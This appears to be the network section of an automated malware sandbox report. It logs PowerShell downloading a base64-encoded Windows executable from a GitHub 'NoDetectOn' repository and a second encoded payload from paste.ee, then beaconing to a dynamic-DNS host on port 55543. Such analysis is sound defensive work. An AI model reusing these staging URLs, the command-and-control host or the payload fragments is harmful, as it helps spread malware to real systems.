Oct 3, 2024 09:29:28.931425095 CEST	55543	49749	45.133.172.96	192.168.2.9
Oct 3, 2024 09:29:28.931502104 CEST	49749	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:29:28.931574106 CEST	49749	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:29:28.936511993 CEST	55543	49749	45.133.172.96	192.168.2.9
Oct 3, 2024 09:29:29.699189901 CEST	49750	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:29:29.704101086 CEST	55543	49750	45.133.172.96	192.168.2.9
Oct 3, 2024 09:29:29.704164982 CEST	49750	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:29:29.707884073 CEST	49750	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:29:29.712732077 CEST	55543	49750	45.133.172.96	192.168.2.9
Oct 3, 2024 09:29:31.306195974 CEST	55543	49750	45.133.172.96	192.168.2.9
Oct 3, 2024 09:29:31.306257963 CEST	49750	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:29:31.306298971 CEST	49750	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:29:31.311055899 CEST	55543	49750	45.133.172.96	192.168.2.9
Oct 3, 2024 09:29:32.058310986 CEST	49751	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:29:32.063322067 CEST	55543	49751	45.133.172.96	192.168.2.9
Oct 3, 2024 09:29:32.063405991 CEST	49751	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:29:32.068320990 CEST	49751	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:29:32.073084116 CEST	55543	49751	45.133.172.96	192.168.2.9
Oct 3, 2024 09:29:33.665628910 CEST	55543	49751	45.133.172.96	192.168.2.9
Oct 3, 2024 09:29:33.665715933 CEST	49751	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:29:33.665769100 CEST	49751	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:29:33.670561075 CEST	55543	49751	45.133.172.96	192.168.2.9
Oct 3, 2024 09:29:34.386456966 CEST	49752	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:29:34.391417027 CEST	55543	49752	45.133.172.96	192.168.2.9
Oct 3, 2024 09:29:34.394454002 CEST	49752	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:29:34.398015976 CEST	49752	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:29:34.402928114 CEST	55543	49752	45.133.172.96	192.168.2.9
Oct 3, 2024 09:29:35.990525007 CEST	55543	49752	45.133.172.96	192.168.2.9
Oct 3, 2024 09:29:35.990740061 CEST	49752	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:29:35.990740061 CEST	49752	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:29:35.995718956 CEST	55543	49752	45.133.172.96	192.168.2.9

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 3, 2024 09:27:40.803699017 CEST	64001	53	192.168.2.9	1.1.1.1
Oct 3, 2024 09:27:40.810529947 CEST	53	64001	1.1.1.1	192.168.2.9
Oct 3, 2024 09:27:43.917181015 CEST	61891	53	192.168.2.9	1.1.1.1
Oct 3, 2024 09:27:43.924559116 CEST	53	61891	1.1.1.1	192.168.2.9
Oct 3, 2024 09:27:45.594311953 CEST	58104	53	192.168.2.9	1.1.1.1
Oct 3, 2024 09:27:45.603777885 CEST	53	58104	1.1.1.1	192.168.2.9
Oct 3, 2024 09:28:45.870556116 CEST	56997	53	192.168.2.9	1.1.1.1
Oct 3, 2024 09:28:45.898762941 CEST	53	56997	1.1.1.1	192.168.2.9

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 3, 2024 09:27:40.803699017 CEST	192.168.2.9	1.1.1.1	0x2f0d	Standard query (0)	raw.githubusercontent.com	A (IP address)	IN (0x0001)	false
Oct 3, 2024 09:27:43.917181015 CEST	192.168.2.9	1.1.1.1	0x9c7e	Standard query (0)	paste.ee	A (IP address)	IN (0x0001)	false
Oct 3, 2024 09:27:45.594311953 CEST	192.168.2.9	1.1.1.1	0x1132	Standard query (0)	ab9001.ddns.net	A (IP address)	IN (0x0001)	false
Oct 3, 2024 09:28:45.870556116 CEST	192.168.2.9	1.1.1.1	0xbe0b	Standard query (0)	ab9001.ddns.net	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Oct 3, 2024 09:27:40.810529947 CEST	1.1.1.1	192.168.2.9	0x2f0d	No error (0)	raw.githubusercontent.com	185.199.108.133	A (IP address)	IN (0x0001)	false
Oct 3, 2024 09:27:40.810529947 CEST	1.1.1.1	192.168.2.9	0x2f0d	No error (0)	raw.githubusercontent.com	185.199.109.133	A (IP address)	IN (0x0001)	false
Oct 3, 2024 09:27:40.810529947 CEST	1.1.1.1	192.168.2.9	0x2f0d	No error (0)	raw.githubusercontent.com	185.199.110.133	A (IP address)	IN (0x0001)	false
Oct 3, 2024 09:27:40.810529947 CEST	1.1.1.1	192.168.2.9	0x2f0d	No error (0)	raw.githubusercontent.com	185.199.111.133	A (IP address)	IN (0x0001)	false
Oct 3, 2024 09:27:43.924559116 CEST	1.1.1.1	192.168.2.9	0x9c7e	No error (0)	paste.ee	188.114.96.3	A (IP address)	IN (0x0001)	false
Oct 3, 2024 09:27:43.924559116 CEST	1.1.1.1	192.168.2.9	0x9c7e	No error (0)	paste.ee	188.114.97.3	A (IP address)	IN (0x0001)	false
Oct 3, 2024 09:27:45.603777885 CEST	1.1.1.1	192.168.2.9	0x1132	No error (0)	ab9001.ddns.net	45.133.172.96	A (IP address)	IN (0x0001)	false
Oct 3, 2024 09:28:45.898762941 CEST	1.1.1.1	192.168.2.9	0xbe0b	No error (0)	ab9001.ddns.net	45.133.172.96	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

raw.githubusercontent.com

paste.ee

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.9	49706	185.199.108.133	443	8080	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 07:27:41 UTC	128	OUT	GET /NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt HTTP/1.1 Host: raw.githubusercontent.com Connection: Keep-Alive
2024-10-03 07:27:41 UTC	904	IN	HTTP/1.1 200 OK Connection: close Content-Length: 2935468 Cache-Control: max-age=300 Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox Content-Type: text/plain; charset=utf-8 ETag: "df9ff7aedbae4b4f50e2ae3a8f13fd0b84c66fbd35e7ac0df91a7a47b720c032" Strict-Transport-Security: max-age=31536000 X-Content-Type-Options: nosniff X-Frame-Options: deny X-XSS-Protection: 1; mode=block X-GitHub-Request-Id: 084A:3AEAEF:29B470:2D35AB:66FE476D Accept-Ranges: bytes Date: Thu, 03 Oct 2024 07:27:41 GMT Via: 1.1 varnish X-Served-By: cache-nyc-kteb1890057-NYC X-Cache: MISS X-Cache-Hits: 0 X-Timer: S1727940461.369436,VS0,VE171 Vary: Authorization,Accept-Encoding,Origin Access-Control-Allow-Origin: * Cross-Origin-Resource-Policy: cross-origin X-Fastly-Request-ID: 287ba79f72bf9a00f156fa9520b888f81d7122ce Expires: Thu, 03 Oct 2024 07:32:41 GMT Source-Age: 0
2024-10-03 07:27:41 UTC	1378	IN	Data Raw: 54 56 71 51 41 41 4d 41 41 41 41 45 41 41 41 41 2f 2f 38 41 41 4c 67 41 41 41 41 41 41 41 41 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 67 41 41 41 41 41 34 66 75 67 34 41 74 41 6e 4e 49 62 67 42 54 4d 30 68 56 47 68 70 63 79 42 77 63 6d 39 6e 63 6d 46 74 49 47 4e 68 62 6d 35 76 64 43 42 69 5a 53 42 79 64 57 34 67 61 57 34 67 52 45 39 54 49 47 31 76 5a 47 55 75 44 51 30 4b 4a 41 41 41 41 41 41 41 41 41 42 51 52 51 41 41 54 41 45 44 41 41 4f 50 39 57 59 41 41 41 41 41 41 41 41 41 41 4f 41 41 44 69 45 4c 41 54 41 41 41 4a 41 68 41 41 41 47 41 41 41 41 41 41 41 41 33 71 38 68 41 41 41 67 41 41 41 41 77 43 45 41 41 41 42 41 41 41 41 67 41 41 41 41 41 67 41 Data Ascii: TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAAOP9WYAAAAAAAAAAOAADiELATAAAJAhAAAGAAAAAAAA3q8hAAAgAAAAwCEAAABAAAAgAAAAAgA
2024-10-03 07:27:41 UTC	1378	IN	Data Raw: 41 41 42 67 41 41 41 44 67 41 41 41 41 41 4b 67 49 44 66 51 55 41 41 41 51 67 41 41 41 41 41 48 36 45 45 41 41 45 65 30 41 51 41 41 51 35 30 76 2f 2f 2f 79 59 67 41 41 41 41 41 44 6a 48 2f 2f 2f 2f 41 45 59 6f 45 67 41 41 42 67 49 6f 43 51 41 41 42 69 67 42 41 41 41 4b 4b 67 41 41 45 7a 41 44 41 47 30 41 41 41 41 42 41 41 41 52 49 41 45 41 41 41 44 2b 44 67 41 41 4f 41 41 41 41 41 44 2b 44 41 41 41 52 51 49 41 41 41 41 46 41 41 41 41 47 51 41 41 41 44 67 41 41 41 41 41 41 69 67 55 41 41 41 47 41 32 38 46 41 41 41 47 4b 42 55 41 41 41 59 71 46 69 6f 43 4b 42 4d 41 41 41 59 44 4b 42 4d 41 41 41 59 6f 41 67 41 41 43 6a 6e 6f 2f 2f 2f 2f 49 41 41 41 41 41 42 2b 68 42 41 41 42 48 73 75 45 41 41 45 4f 72 44 2f 2f 2f 38 6d 49 41 41 41 41 41 41 34 70 66 2f 2f 2f Data Ascii: AABgAAADgAAAAAKgIDfQUAAAQgAAAAAH6EEAAEe0AQAAQ50v///yYgAAAAADjH////AEYoEgAABgIoCQAABigBAAAKKgAAEzADAG0AAAABAAARIAEAAAD+DgAAOAAAAAD+DAAARQIAAAAFAAAAGQAAADgAAAAAAigUAAAGA28FAAAGKBUAAAYqFioCKBMAAAYDKBMAAAYoAgAACjno////IAAAAAB+hBAABHsuEAAEOrD///8mIAAAAAA4pf///
2024-10-03 07:27:41 UTC	1378	IN	Data Raw: 49 41 45 41 41 41 41 34 6d 66 2f 2f 2f 77 49 4f 42 48 30 4a 41 41 41 45 49 41 41 41 41 41 42 2b 68 42 41 41 42 48 74 61 45 41 41 45 4f 58 33 2f 2f 2f 38 6d 49 41 41 41 41 41 41 34 63 76 2f 2f 2f 7a 49 43 4b 42 6b 41 41 41 59 6f 4a 77 41 41 42 69 6f 41 41 41 41 54 4d 41 4d 41 6b 51 41 41 41 41 4d 41 41 42 45 67 41 77 41 41 41 50 34 4f 41 41 41 34 41 41 41 41 41 50 34 4d 41 41 42 46 42 41 41 41 41 41 59 41 41 41 41 46 41 41 41 41 4c 41 41 41 41 46 49 41 41 41 41 34 41 51 41 41 41 43 6f 52 41 53 67 6b 41 41 41 47 49 41 41 41 41 41 42 2b 68 42 41 41 42 48 73 2f 45 41 41 45 4f 73 72 2f 2f 2f 38 6d 49 41 45 41 41 41 41 34 76 2f 2f 2f 2f 78 45 42 4f 64 4c 2f 2f 2f 38 67 41 41 41 41 41 48 36 45 45 41 41 45 65 33 77 51 41 41 51 36 70 50 2f 2f 2f 79 59 67 41 41 41 Data Ascii: IAEAAAA4mf///wIOBH0JAAAEIAAAAAB+hBAABHtaEAAEOX3///8mIAAAAAA4cv///zICKBkAAAYoJwAABioAAAATMAMAkQAAAAMAABEgAwAAAP4OAAA4AAAAAP4MAABFBAAAAAYAAAAFAAAALAAAAFIAAAA4AQAAACoRASgkAAAGIAAAAAB+hBAABHs/EAAEOsr///8mIAEAAAA4v////xEBOdL///8gAAAAAH6EEAAEe3wQAAQ6pP///yYgAAA
2024-10-03 07:27:41 UTC	1378	IN	Data Raw: 45 67 41 41 41 41 41 48 36 45 45 41 41 45 65 79 49 51 41 41 51 36 53 66 2f 2f 2f 79 59 67 42 41 41 41 41 44 67 2b 2f 2f 2f 2f 45 51 51 6f 4f 51 41 41 42 6a 72 4d 2f 2f 2f 2f 49 41 41 41 41 41 42 2b 68 42 41 41 42 48 74 6d 45 41 41 45 4f 68 37 2f 2f 2f 38 6d 49 41 41 41 41 41 41 34 45 2f 2f 2f 2f 39 33 45 2f 76 2f 2f 45 51 51 36 58 51 41 41 41 43 41 41 41 41 41 41 66 6f 51 51 41 41 52 37 69 68 41 41 42 44 6b 50 41 41 41 41 4a 69 41 41 41 41 41 41 4f 41 51 41 41 41 44 2b 44 41 55 41 52 51 4d 41 41 41 41 46 41 41 41 41 4b 51 41 41 41 44 6f 41 41 41 41 34 41 41 41 41 41 44 67 77 41 41 41 41 49 41 45 41 41 41 42 2b 68 42 41 41 42 48 73 6f 45 41 41 45 4f 74 48 2f 2f 2f 38 6d 49 41 45 41 41 41 41 34 78 76 2f 2f 2f 78 45 45 4b 44 6f 41 41 41 59 67 41 67 41 41 41 Data Ascii: EgAAAAAH6EEAAEeyIQAAQ6Sf///yYgBAAAADg+////EQQoOQAABjrM////IAAAAAB+hBAABHtmEAAEOh7///8mIAAAAAA4E////93E/v//EQQ6XQAAACAAAAAAfoQQAAR7ihAABDkPAAAAJiAAAAAAOAQAAAD+DAUARQMAAAAFAAAAKQAAADoAAAA4AAAAADgwAAAAIAEAAAB+hBAABHsoEAAEOtH///8mIAEAAAA4xv///xEEKDoAAAYgAgAAA
2024-10-03 07:27:41 UTC	1378	IN	Data Raw: 4f 4a 50 2f 2f 2f 38 43 46 48 30 51 41 41 41 45 49 41 55 41 41 41 41 34 67 76 2f 2f 2f 77 4a 37 45 41 41 41 42 43 67 45 41 41 41 72 49 41 45 41 41 41 42 2b 68 42 41 41 42 48 74 63 45 41 41 45 4f 6d 50 2f 2f 2f 38 6d 49 41 45 41 41 41 41 34 57 50 2f 2f 2f 79 6f 71 41 6e 73 50 41 41 41 45 4b 41 55 41 41 43 73 67 41 41 41 41 41 48 36 45 45 41 41 45 65 78 6b 51 41 41 51 35 4e 2f 2f 2f 2f 79 59 67 41 41 41 41 41 44 67 73 2f 2f 2f 2f 41 41 41 6d 66 68 45 41 41 41 51 55 2f 67 45 71 41 41 41 61 66 68 45 41 41 41 51 71 41 43 72 2b 43 51 41 41 62 77 30 41 41 41 6f 71 41 43 72 2b 43 51 41 41 62 77 63 41 41 41 6f 71 41 43 72 2b 43 51 41 41 62 31 30 41 41 41 59 71 41 44 34 41 2f 67 6b 41 41 50 34 4a 41 51 41 6f 62 77 41 41 42 69 6f 36 2f 67 6b 41 41 50 34 4a 41 51 42 Data Ascii: OJP///8CFH0QAAAEIAUAAAA4gv///wJ7EAAABCgEAAArIAEAAAB+hBAABHtcEAAEOmP///8mIAEAAAA4WP///yoqAnsPAAAEKAUAACsgAAAAAH6EEAAEexkQAAQ5N////yYgAAAAADgs////AAAmfhEAAAQU/gEqAAAafhEAAAQqACr+CQAAbw0AAAoqACr+CQAAbwcAAAoqACr+CQAAb10AAAYqAD4A/gkAAP4JAQAobwAABio6/gkAAP4JAQB
2024-10-03 07:27:41 UTC	1378	IN	Data Raw: 67 41 41 41 5a 7a 45 41 41 41 43 6e 4d 52 41 41 41 4b 66 52 41 41 41 41 51 67 41 67 41 41 41 48 36 45 45 41 41 45 65 32 34 51 41 41 51 35 41 50 37 2f 2f 79 59 67 48 51 41 41 41 44 6a 31 2f 66 2f 2f 41 78 38 51 4b 4e 45 43 41 41 59 35 4a 41 49 41 41 43 41 4f 41 41 41 41 66 6f 51 51 41 41 52 37 4a 68 41 41 42 44 6e 55 2f 66 2f 2f 4a 69 41 44 41 41 41 41 4f 4d 6e 39 2f 2f 38 43 65 78 59 41 41 41 51 52 42 68 45 48 49 50 2f 2f 2f 33 39 66 63 31 67 41 41 41 5a 76 45 67 41 41 43 69 41 52 41 41 41 41 66 6f 51 51 41 41 52 37 55 78 41 41 42 44 71 62 2f 66 2f 2f 4a 69 41 61 41 41 41 41 4f 4a 44 39 2f 2f 38 43 63 78 4d 41 41 41 70 39 46 67 41 41 42 43 41 48 41 41 41 41 4f 48 76 39 2f 2f 38 52 42 79 41 41 41 41 43 41 58 7a 6c 4a 41 51 41 41 49 41 55 41 41 41 41 34 5a Data Ascii: gAAAZzEAAACnMRAAAKfRAAAAQgAgAAAH6EEAAEe24QAAQ5AP7//yYgHQAAADj1/f//Ax8QKNECAAY5JAIAACAOAAAAfoQQAAR7JhAABDnU/f//JiADAAAAOMn9//8CexYAAAQRBhEHIP///39fc1gAAAZvEgAACiARAAAAfoQQAAR7UxAABDqb/f//JiAaAAAAOJD9//8CcxMAAAp9FgAABCAHAAAAOHv9//8RByAAAACAXzlJAQAAIAUAAAA4Z
2024-10-03 07:27:41 UTC	1378	IN	Data Raw: 41 41 42 2b 68 42 41 41 42 48 73 78 45 41 41 45 4f 6b 6a 2f 2f 2f 38 6d 49 41 41 41 41 41 41 34 50 66 2f 2f 2f 7a 6a 53 2f 2f 2f 2f 49 41 55 41 41 41 41 34 4c 76 2f 2f 2f 77 41 6f 55 67 41 41 42 68 45 42 4b 46 4d 41 41 41 59 54 42 53 41 41 41 41 41 41 66 6f 51 51 41 41 52 37 5a 78 41 41 42 44 6f 50 41 41 41 41 4a 69 41 41 41 41 41 41 4f 41 51 41 41 41 44 2b 44 41 49 41 52 51 45 41 41 41 41 46 41 41 41 41 4f 41 41 41 41 41 44 64 5a 77 41 41 41 43 59 67 41 41 41 41 41 48 36 45 45 41 41 45 65 30 73 51 41 41 51 36 44 77 41 41 41 43 59 67 41 41 41 41 41 44 67 45 41 41 41 41 2f 67 77 41 41 45 55 43 41 41 41 41 42 51 41 41 41 43 63 41 41 41 41 34 41 41 41 41 41 42 51 54 42 53 41 41 41 41 41 41 66 6f 51 51 41 41 52 37 67 68 41 41 42 44 72 58 2f 2f 2f 2f 4a 69 41 Data Ascii: AAB+hBAABHsxEAAEOkj///8mIAAAAAA4Pf///zjS////IAUAAAA4Lv///wAoUgAABhEBKFMAAAYTBSAAAAAAfoQQAAR7ZxAABDoPAAAAJiAAAAAAOAQAAAD+DAIARQEAAAAFAAAAOAAAAADdZwAAACYgAAAAAH6EEAAEe0sQAAQ6DwAAACYgAAAAADgEAAAA/gwAAEUCAAAABQAAACcAAAA4AAAAABQTBSAAAAAAfoQQAAR7ghAABDrX////JiA
2024-10-03 07:27:41 UTC	1378	IN	Data Raw: 59 67 43 41 41 41 41 44 67 4a 2f 76 2f 2f 45 51 45 6f 53 77 41 41 42 68 4d 48 49 41 73 41 41 41 41 34 39 76 33 2f 2f 78 45 4a 4b 68 45 41 65 78 67 41 41 41 51 6f 56 77 41 41 42 6e 4d 67 41 41 41 47 45 77 6b 67 42 67 41 41 41 44 6a 57 2f 66 2f 2f 4f 4e 37 2f 2f 2f 38 67 44 41 41 41 41 48 36 45 45 41 41 45 65 7a 38 51 41 41 51 36 76 66 33 2f 2f 79 59 67 44 67 41 41 41 44 69 79 2f 66 2f 2f 41 6e 73 54 41 41 41 45 45 51 51 52 42 53 68 57 41 41 41 47 45 77 67 67 42 77 41 41 41 44 69 58 2f 66 2f 2f 41 42 4d 77 41 77 42 39 41 41 41 41 41 51 41 41 45 53 41 43 41 41 41 41 2f 67 34 41 41 44 67 41 41 41 41 41 2f 67 77 41 41 45 55 44 41 41 41 41 57 51 41 41 41 41 55 41 41 41 41 76 41 41 41 41 4f 46 51 41 41 41 41 43 63 77 34 41 41 41 70 39 45 41 41 41 42 43 41 41 41 Data Ascii: YgCAAAADgJ/v//EQEoSwAABhMHIAsAAAA49v3//xEJKhEAexgAAAQoVwAABnMgAAAGEwkgBgAAADjW/f//ON7///8gDAAAAH6EEAAEez8QAAQ6vf3//yYgDgAAADiy/f//AnsTAAAEEQQRBShWAAAGEwggBwAAADiX/f//ABMwAwB9AAAAAQAAESACAAAA/g4AADgAAAAA/gwAAEUDAAAAWQAAAAUAAAAvAAAAOFQAAAACcw4AAAp9EAAABCAAA
2024-10-03 07:27:41 UTC	1378	IN	Data Raw: 42 68 62 2b 42 43 6f 41 41 41 41 2b 44 77 41 44 4b 48 45 41 41 41 59 57 2f 67 49 57 2f 67 45 71 4d 67 38 41 41 79 68 78 41 41 41 47 46 76 34 43 4b 67 41 41 41 44 34 50 41 41 4d 6f 63 51 41 41 42 68 62 2b 42 42 62 2b 41 53 6f 6d 44 77 41 44 4b 48 49 41 41 41 59 71 41 41 41 79 44 77 41 44 4b 48 49 41 41 41 59 57 2f 67 45 71 41 41 41 41 45 7a 41 44 41 41 6f 42 41 41 41 4b 41 41 41 52 49 41 51 41 41 41 44 2b 44 67 41 41 4f 41 41 41 41 41 44 2b 44 41 41 41 52 51 55 41 41 41 43 4b 41 41 41 41 73 51 41 41 41 41 55 41 41 41 42 67 41 41 41 41 4c 77 41 41 41 44 69 46 41 41 41 41 45 67 45 44 65 78 30 41 41 41 51 6f 48 51 41 41 43 69 6f 43 65 78 34 41 41 41 52 76 48 67 41 41 43 67 4e 37 48 67 41 41 42 43 68 34 41 41 41 47 62 78 38 41 41 41 6f 71 41 69 68 6a 41 41 41 Data Ascii: Bhb+BCoAAAA+DwADKHEAAAYW/gIW/gEqMg8AAyhxAAAGFv4CKgAAAD4PAAMocQAABhb+BBb+ASomDwADKHIAAAYqAAAyDwADKHIAAAYW/gEqAAAAEzADAAoBAAAKAAARIAQAAAD+DgAAOAAAAAD+DAAARQUAAACKAAAAsQAAAAUAAABgAAAALwAAADiFAAAAEgEDex0AAAQoHQAACioCex4AAARvHgAACgN7HgAABCh4AAAGbx8AAAoqAihjAAA
2024-10-03 07:27:41 UTC	1378	IN	Data Raw: 2f 2f 2f 78 4d 77 41 77 43 42 41 41 41 41 43 77 41 41 45 53 41 43 41 41 41 41 2f 67 34 41 41 44 67 41 41 41 41 41 2f 67 77 41 41 45 55 44 41 41 41 41 4c 51 41 41 41 44 67 41 41 41 41 46 41 41 41 41 4f 43 67 41 41 41 41 43 41 79 68 37 41 41 41 47 45 77 45 67 41 51 41 41 41 48 36 45 45 41 41 45 65 35 59 51 41 41 51 36 7a 66 2f 2f 2f 79 59 67 41 51 41 41 41 44 6a 43 2f 2f 2f 2f 46 43 6f 52 41 51 51 6f 67 51 41 41 42 69 6f 52 41 54 72 77 2f 2f 2f 2f 49 41 41 41 41 41 42 2b 68 42 41 41 42 48 73 31 45 41 41 45 4f 5a 7a 2f 2f 2f 38 6d 49 41 41 41 41 41 41 34 6b 66 2f 2f 2f 77 41 41 41 42 4d 77 42 41 43 43 41 41 41 41 43 77 41 41 45 53 41 42 41 41 41 41 2f 67 34 41 41 44 67 41 41 41 41 41 2f 67 77 41 41 45 55 44 41 41 41 41 42 51 41 41 41 43 73 41 41 41 42 55 41 Data Ascii: ///xMwAwCBAAAACwAAESACAAAA/g4AADgAAAAA/gwAAEUDAAAALQAAADgAAAAFAAAAOCgAAAACAyh7AAAGEwEgAQAAAH6EEAAEe5YQAAQ6zf///yYgAQAAADjC////FCoRAQQogQAABioRATrw////IAAAAAB+hBAABHs1EAAEOZz///8mIAAAAAA4kf///wAAABMwBACCAAAACwAAESABAAAA/g4AADgAAAAA/gwAAEUDAAAABQAAACsAAABUA

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.9	49708	188.114.96.3	443	8080	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 07:27:44 UTC	67	OUT	GET /d/5vQgr/0 HTTP/1.1 Host: paste.ee Connection: Keep-Alive
2024-10-03 07:27:44 UTC	1202	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 07:27:44 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: close Cache-Control: max-age=2592000 strict-transport-security: max-age=63072000 x-frame-options: DENY x-content-type-options: nosniff x-xss-protection: 1; mode=block content-security-policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://cdnjs.cloudflare.com https://www.google.com https://www.gstatic.com https://analytics.paste.ee; img-src 'self' https://secure.gravatar.com https://analytics.paste.ee data:; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://cdnjs.cloudflare.com; font-src 'self' https://themes.googleusercontent.com https://fonts.gstatic.com; frame-src https://www.google.com; object-src 'none' CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2%2FCkt8Ci1eg1Wk8CWRzyqmaD2N9cTeDJujMJGe2Tix7lOvEcNpXN4bsOhDeovwR9lkveg35mkEwA9m9m71WI8bx2ae0OalynhOrBHqIlgz4nabxj%2FFsrbnuh8g%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ccb361efc0543b3-EWR
2024-10-03 07:27:44 UTC	167	IN	Data Raw: 31 66 37 66 0d 0a 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 50 59 79 44 65 38 77 46 50 38 77 44 48 37 67 2f 4f 73 76 44 7a 37 41 36 4f 45 75 44 5a 37 51 30 4f 67 73 44 41 36 77 74 4f 38 71 44 6e 36 Data Ascii: 1f7fAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAPYyDe8wFP8wDH7g/OsvDz7A6OEuDZ7Q0OgsDA6wtO8qDn6
2024-10-03 07:27:44 UTC	1369	IN	Data Raw: 77 6e 4f 63 70 44 4e 36 67 68 4f 41 6b 44 2f 35 67 66 4f 30 6e 44 38 35 77 65 4f 6f 6e 44 6b 7a 51 79 4d 67 49 44 6c 79 41 70 4d 30 4a 44 63 79 77 6d 4d 67 4a 44 53 79 67 6a 4d 6f 49 44 47 79 67 51 4d 59 48 44 79 78 51 63 4d 41 48 44 76 78 67 62 4d 30 47 44 73 78 77 61 4d 6f 47 44 6e 78 67 5a 4d 55 47 44 6b 78 77 59 4d 49 47 44 68 78 41 59 4d 38 46 44 65 78 67 57 4d 6b 46 44 59 41 41 41 41 4d 43 67 42 67 44 41 41 41 6f 44 56 36 41 6b 4f 34 6f 44 4a 36 77 68 4f 55 6f 44 44 36 67 67 4f 41 6b 44 37 35 51 65 4f 51 6e 44 79 35 41 63 4f 34 6d 44 74 35 41 62 4f 73 6d 44 71 35 41 61 4f 63 6d 44 6c 35 41 59 4f 34 6c 44 5a 35 77 56 4f 55 6c 44 54 35 67 53 4f 67 6b 44 47 35 51 42 4f 34 6a 44 32 34 51 4e 4f 34 69 44 6d 34 67 48 4f 59 68 44 4f 34 67 78 4e 34 66 44 32 Data Ascii: wnOcpDN6ghOAkD/5gfO0nD85weOonDkzQyMgIDlyApM0JDcywmMgJDSygjMoIDGygQMYHDyxQcMAHDvxgbM0GDsxwaMoGDnxgZMUGDkxwYMIGDhxAYM8FDexgWMkFDYAAAAMCgBgDAAAoDV6AkO4oDJ6whOUoDD6ggOAkD75QeOQnDy5AcO4mDt5AbOsmDq5AaOcmDl5AYO4lDZ5wVOUlDT5gSOgkDG5QBO4jD24QNO4iDm4gHOYhDO4gxN4fD2
2024-10-03 07:27:44 UTC	1369	IN	Data Raw: 69 4d 63 49 44 47 79 51 68 4d 51 49 44 44 79 67 67 4d 45 49 44 41 41 41 41 41 41 43 67 42 41 42 77 4d 34 4d 44 4d 7a 67 79 4d 67 4d 44 47 7a 41 78 4d 49 4d 44 41 79 67 76 4d 77 4c 44 36 79 41 75 4d 59 4c 44 30 79 67 73 4d 41 4c 44 75 79 41 72 4d 6f 4b 44 6f 79 67 70 4d 51 4b 44 69 79 41 6f 4d 34 4a 44 63 79 67 6d 4d 67 4a 44 57 79 41 6c 4d 49 4a 44 51 79 67 6a 4d 77 49 44 4b 79 41 69 4d 59 49 44 45 79 67 67 4d 41 45 44 2b 78 41 66 4d 6f 48 44 34 78 67 64 4d 51 48 44 79 78 41 63 4d 34 47 44 73 78 67 61 4d 67 47 44 6d 78 41 5a 4d 49 47 44 67 78 67 58 4d 77 46 44 61 78 41 57 4d 59 46 44 55 78 67 55 4d 41 46 44 4f 78 41 54 4d 6f 45 44 49 78 67 52 4d 51 45 44 43 78 41 41 4d 34 44 44 38 77 67 4f 4d 67 44 44 32 77 41 4e 4d 49 44 44 77 77 67 4c 4d 77 43 44 71 77 Data Ascii: 